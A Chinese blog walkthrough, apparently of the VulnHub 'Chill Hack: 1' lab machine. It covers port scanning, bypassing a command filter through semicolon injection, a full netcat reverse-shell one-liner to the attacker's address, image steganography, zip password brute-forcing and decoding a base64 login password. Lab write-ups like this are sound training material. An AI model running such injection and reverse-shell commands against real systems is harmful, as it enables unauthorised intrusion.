vulnhub靶机-CHILL HACK: 1-优快云博客

本文链接：https://blog.youkuaiyun.com/weixin_43784056/article/details/111472802

靶机描述：提示枚举

1、找到靶机ip：192.168.74.135

nmap -sn 192.168.74.0/24

2、扫描靶机端口

root@kali:~# nmap -A -p- 192.168.74.135
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.74.135
Host is up (0.0044s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03 04:33 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.74.129
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
MAC Address: 00:0C:29:60:7D:E9 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/21%OT=21%CT=1%CU=32901%PV=Y%DS=1%DC=D%G=Y%M=000C29%
OS:TM=5FE03DF0%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=
OS:I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%
OS:O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W
OS:6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   4.42 ms 192.168.74.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.44 seconds
root@kali:~#

3、先访问ftp服务，发现有一个note.txt文件，查看内容，提示命令有过滤，应该是后面有个地方要用到命令注入

Anurodh told me that there is some filtering on strings being put in the command -- Apaar

4、访问80端口，主页是一个花里胡哨的静态页面，没什么有用的东西，扫一下目录，发现secret目录

访问之后，发现是一个执行命令的页面，先输入ifconfig成功发现回显

输入cat、ls、bash、php等就显示hack（有ctf那味了）

我这里使用tac绕过，查看一下它都过滤哪些命令

tac index.php

核心代码如下

它这里的检验机制只不过是把我们输入的命令按照空格分开，然后一个一个匹配，比较容易绕过（ps：这里的ls只需在中间加上''也能绕过）

使用分号执行多条命令（'|'，'&'，'||'，'&&'，等等都行）绕过检测成功反弹shell，python3提权到tty

ls;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.74.129 1234 >/tmp/f

5、在经过一番搜寻之后在/var/www目录下发现有个files文件夹，进入之后，发现有一个hacker.php，查看内容

<html>
<head>
<body>
<style>
body {
  background-image: url('images/002d7e638fb463fb7a266f5ffc7ac47d.gif');
}
h2
{
        color:red;
        font-weight: bold;
}
h1
{
        color: yellow;
        font-weight: bold;
}
</style>
<center>
        <img src = "images/hacker-with-laptop_23-2147985341.jpg"><br>
        <h1 style="background-color:red;">You have reached this far. </h2>
        <h1 style="background-color:black;">Look in the dark! You will find your answer</h1>
</center>
</head>
</html>

6、看它话里的提示look in the dark，加上图片名这么花哨，应该是隐写了，这十分ctf，通过python3在images目录下搭建一个简易web服务器，将图片下载到本地

靶机：python3 -m http.server &
本地：
wget http://192.168.74.135:8000/hacker-with-laptop_23-2147985341.jpg //下载图片
steghide info hacker-with-laptop_23-2147985341.jpg //分析图片内隐藏信息
steghide extract -sf hacker-with-laptop_23-2147985341.jpg //提取图片内隐藏的压缩包

解压压缩包时需要密码

根据最开始的提示：枚举，直接开始爆破

成功爆破，得到密码为pass1word

解压压缩包后查看文件内容

<html>
<head>
        Admin Portal
</head>
        <title> Site Under Development ... </title>
        <body>
                <form method="POST">
                        Username: <input type="text" name="name" placeholder="username"><br><br>
                        Email: <input type="email" name="email" placeholder="email"><br><br>
                        Password: <input type="password" name="password" placeholder="password">
                        <input type="submit" name="submit" value="Submit"> 
                </form>
<?php
        if(isset($_POST['submit']))
        {
                $email = $_POST["email"];
                $password = $_POST["password"];
                if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
                { 
                        $random = rand(1000,9999);?><br><br><br>
                        <form method="POST">
                                Enter the OTP: <input type="number" name="otp">
                                <input type="submit" name="submitOtp" value="Submit">
                        </form>
                <?php   mail($email,"OTP for authentication",$random);
                        if(isset($_POST["submitOtp"]))
                                {
                                        $otp = $_POST["otp"];
                                        if($otp == $random)
                                        {
                                                echo "Welcome Anurodh!";
                                                header("Location: authenticated.php");
                                        }
                                        else
                                        {
                                                echo "Invalid OTP";
                                        }
                                }
                }
                else
                {
                        echo "Invalid Username or Password";
                }
        }
?>
</html>

发现中间有一串base64编码，拿去解码得到!d0ntKn0wmYp@ssw0rd